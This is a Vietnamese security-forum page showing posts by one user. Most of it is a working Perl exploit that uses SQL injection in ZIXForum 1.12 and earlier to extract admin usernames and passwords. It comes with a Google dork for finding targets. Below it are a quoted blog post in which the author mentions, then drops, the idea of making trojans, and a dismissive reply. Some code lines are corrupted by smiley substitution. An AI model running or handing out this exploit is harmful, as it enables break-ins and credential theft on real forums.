banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: continue  XML
Profile for continue Messages posted by continue [ number of posts not being displayed on this page: 0 ]
 
#!/usr/bin/perl
###########################################
# ZIXForum <= v1.12 Exploit
# Vulnerability found by Chironex Fleckeri
# Created By: SlimTim10
# <slimtim10@gmail.com>
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################


use IO::Socket::INET;

usage() unless (@ARGV == 2);

$host = shift(@ARGV);
$dir = shift(@ARGV);

$dir = "\/$dir" if ($dir !~ /^\//);
$dir = "$dir\/" if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;

$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $host\r\n"; # show an error!

print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User: ";

while ($answer = <$socket>smilie {
$answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1\n";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $host\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Pass: ";

while ($answer = <$socket>smilie {
$answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1\n";
}

sub usage {
print "\n" . "=|=-" x 14 . "=|=";
print q(
] [
[ ZIXForum <= 1.12 "RepId" Remote SQL Injection Exploit ]
] Tested on ZIXForum <= v1.12 [
[ Created By: SlimTim10 <slimtim10@gmail.com> ]
] [);
print "\n" . "=|=-" x 14 . "=|=\n\n";
print " Usage: $0";
print q( [HOST] [PATH] E.g. );
print "$0";
print q( www.host.com /forum/);
print "\n\n" . "`^" x 29 . "`\n";
exit;
}
# Internet (17/09/2006)

Sinarale wrote:
http://216.109.125.130/search/cache?p=nhut.be&fr=yfp-t-500&toggle=1&ei=UTF-8&u=minhnhut.be/&d=eDfceCQ8NXZU&icp=1&.intl=us
Một ngày trôi qua nữa với nhiều kết quả khả quang rất nhiều với cái AutoIt đang nghiên cứu… Tôi đã tự viết được 2 cái phần mềm nhỏ là Magic Text 1.0 và Pix Down 1.0 bằng AutoIt chỉ với cái Help có sẵn và mấy cái source kiếm sẵn trên mạng. Ngồi từ sáng tới chiều trong 2 ngày thì hoàn thành, tôi đã vốn quen làm việc như vậy nhưng lần này lại cảm thấy chóng mặt. Cái cảm giác đó chỉ biến mất khi tôi đã vùi vào giấc ngủ. Tôi có ý định thêm thắt vài thứ để 2 cái ứng dụng hoạt động như một trojan thực sự nhưng nghĩ lại thì không nên vì đã có 2 bài học xác đáng từ vụ Robotx và Vlove rồi. Tôi nghĩ chỉ nên phát triển website của mình về những ứng dụng có ích mà thôi và tôi cũng sẽ không quay về con đường “tà đạo” nữa. Sau 2 cái này, tôi đang có ý tưởng làm một chương trình trả lời tin nhắn tự động cho Yahoo! Messenger nhưng cần tham khảo thêm vài thứ để có thể hoàn thiện.
....
....
....
28-08-2006
 



thằng nhóc mới lớn này post lên đây làm gì thế
copy & paste
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|